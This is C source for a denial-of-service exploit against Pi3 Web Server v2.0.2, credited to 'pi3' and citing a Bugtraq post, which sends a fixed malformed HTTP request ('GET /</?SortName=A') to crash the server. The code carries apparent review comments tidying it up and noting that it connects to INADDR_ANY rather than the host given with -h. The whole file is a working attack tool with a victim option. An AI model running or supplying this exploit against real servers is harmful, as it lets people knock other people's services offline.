/*
 * Simple DoS exploit for Pi3 Web Server v2.0.2, coded by pi3 (pi3ki31ny)
 * Bug found by rushjo@tripbit.org
 * The post in bugtraq:
 * http://www.securityfocus.com/archive/1/323662
 * BIG thx to: Azido, mcbethh (Ox6D6362), OctiV, bor3cki, appelast, evilcat, cyb3rg4te,
 * jejq, neutrinka, ProXymuS, razer, xsoti, oZiX, barts...
 * && other my friends (you know who you are)
 * 
 * Ps. Lame sploit but sploit ;>
 *
 *         ...::: -=[ www.pi3.int.pl ]=- :::...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
			      
#define PORT 80
#define SA struct sockaddr

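/* Defined further down in this file; declared here so the calls in main()
 * are checked against a prototype instead of an implicit declaration. */
int ussage(void);

/*
 * Proof-of-concept driver for the Pi3 Web Server v2.0.2 issue referenced in
 * the file header: parses -h/-p, opens one TCP connection and sends a single
 * fixed HTTP request, then closes the socket.
 *
 * Options:
 *   -h <name>  host name; it is only checked for resolvability (see the
 *              NOTE(review) on the destination address below)
 *   -p <port>  TCP port, 1..65535 (default PORT)
 *
 * Returns 0 after the request has been written in full; exits with -1 on a
 * lookup, port, socket, connect or write failure. Usage output exits with 0.
 */
int main(int argc, char *argv[]) {

   /*
    * The request line is a fixed literal, so it can be matched verbatim in
    * web-server access logs or in an IDS rule when checking for exposure.
    */
   static const char request[] = "GET /</?SortName=A HTTP/1.0\n\n";
   const size_t request_len = sizeof request - 1;   /* without the NUL */
   struct sockaddr_in servaddr;
   long port = PORT;
   char *end = NULL;
   ssize_t sent;
   int opt, sockfd;

   /* argc is checked rather than argv[1] so an empty argv is never indexed. */
   if (argc < 2) ussage();

   while ((opt = getopt(argc, argv, "h:p:?")) != -1) {
      switch (opt) {

      case 'h':
         /*
          * The original wrote `h=gethostbyname(optarg)==NULL`, which stored
          * the comparison result in a pointer. Only the success/failure of
          * the lookup was ever used, so the test is made directly.
          */
         if (gethostbyname(optarg) == NULL) {
            printf("Gethostbyname() field!\n");
            exit(-1);
         }
         break;

      case 'p':
         /* strtol + range check: atoi() silently accepted junk and overflow. */
         port = strtol(optarg, &end, 10);
         if (end == optarg || *end != '\0' || port < 1 || port > 65535) {
            printf("Invalid port!\n");
            exit(-1);
         }
         break;

      case '?':
      default:
         ussage();
         break;
      }
   }

   /* Zero the whole structure so sin_zero and padding are not stack garbage. */
   memset(&servaddr, 0, sizeof servaddr);
   servaddr.sin_family      = AF_INET;
   servaddr.sin_port        = htons((unsigned short)port);
   /*
    * NOTE(review): the destination is INADDR_ANY, not the name given with -h,
    * exactly as in the original. What connect() does with this address is
    * platform-dependent (commonly it reaches a listener on the local
    * machine) -- confirm on the platform used for testing.
    */
   servaddr.sin_addr.s_addr = htonl(INADDR_ANY);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
      printf("Socket() error!\n");
      exit(-1);
   }

   if (connect(sockfd, (struct sockaddr *)&servaddr, sizeof servaddr) < 0) {
      printf("Connect() error!\n");
      close(sockfd);
      exit(-1);
   }

   printf("\n\t...::: -=[ DoS for Pi3 Web Server v2.0.2 ]=- :::...\n");
   printf("\n\t[+] Bug founded by rushjo@tripbit.org\n\t[+] Expl coded by pi3 (pi3ki31ny)\n\n");

   /* A short or failed write used to be reported as success. */
   sent = write(sockfd, request, request_len);
   if (sent < 0 || (size_t)sent != request_len) {
      printf("Write() error!\n");
      close(sockfd);
      exit(-1);
   }

   printf("\t[+] Packet send... check the website!\n\n");

   close(sockfd);

   return 0;
}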

/*
 * Write the tool banner, the credits and the two accepted options to stdout,
 * then end the process with exit status 0. Control never returns to the
 * caller, so the declared int result is never produced.
 */
int ussage(void) {

      static const char *const lines[] = {
            "\n\t...::: -=[ DoS for Pi3 Web Server v2.0.2 ]=- :::...\n",
            "\n\t[+] Bug founded by rushjo@tripbit.org\n\t[+] Expl coded by pi3 (pi3ki31ny)\n\n",
            " -h <victim>\n -p <port>\n\n",
      };
      size_t idx;

      /* Emit the three text blocks in their original order. */
      for (idx = 0; idx < sizeof lines / sizeof lines[0]; idx++) {
            fputs(lines[idx], stdout);
      }

      exit(0);
}

